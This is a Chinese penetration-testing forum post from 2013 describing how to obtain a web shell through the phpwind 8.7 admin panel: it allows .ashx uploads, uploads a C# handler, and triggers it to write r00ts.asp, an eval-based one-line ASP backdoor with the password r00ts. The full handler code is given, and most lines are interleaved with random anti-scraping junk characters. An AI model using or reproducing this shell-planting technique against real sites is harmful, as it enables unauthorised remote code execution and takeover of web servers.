中国网络渗透测试联盟

标题: phpwind 8.7 后台拿shell [打印本页]
作者: admin    时间: 2013-7-26 12:41
标题: phpwind 8.7 后台拿shell
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小
; D0 D' Q7 D- w' b" R  n # v  a4 g2 s# h9 j) `' S3 S; l
群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx3 A) w6 Z; a: ^, Q

0 q: U& }0 c) t$ c6 _3 _" z发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整
1 \2 s$ b! H9 p$ M7 L* f6 I) C
9 K: W: e- {# s" o8 h- U) e然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx
% q; ^# N  M8 c( V6 X3 C 6 ?, ?4 A0 ^1 Z5 t! ?5 @
打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
5 P" m1 y0 s  p) l8 V" \- O0 c* B * t2 h, J8 A# h; g- V
下面是代码:& |6 _* `3 L6 J, w4 p0 y3 U7 D

1 I. f# z& F1 ]<%@ WebHandler Language="C#"Class="Handler" %># y; V: K2 q& j7 \) M& b
using System;
8 Y, }  b7 f6 H9 V. \" ?1 vusing System.Web;. G5 i, e4 U7 S6 z/ I3 W
using System.IO;1 G: `, ]3 _9 \
public class Handler : IHttpHandler {
6 u6 m. V, O4 I5 P) Xpublic void ProcessRequest (HttpContext context) {
- ^, r0 |, ]; c1 _3 |. ccontext.Response.ContentType = "text/plain";
5 k+ [/ z% S/ b! u5 h6 NStreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));5 g" Q9 @" t) u
file1.Write("<%eval request(\"r00ts\")%>");) r& `( J# t/ D1 X( i
file1.Flush();6 X4 R  `3 S% O. W* T
file1.Close();
& r" P& y9 e! M( a# W}, X" p, ~, C, v% ~2 Y% O! ^
public bool IsReusable {
! q* B( z/ m  ]% X: S; d+ d' s9 [get {
- |% m9 j" D+ i! h2 r6 Nreturn false;
3 a3 z2 ~$ ^4 o  M+ v}9 n+ W, o. e, v) h4 O4 `$ \* j
}9 ?7 a' L. n/ w6 x- G( Z
}
4 _6 s/ Z' `1 q5 W



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2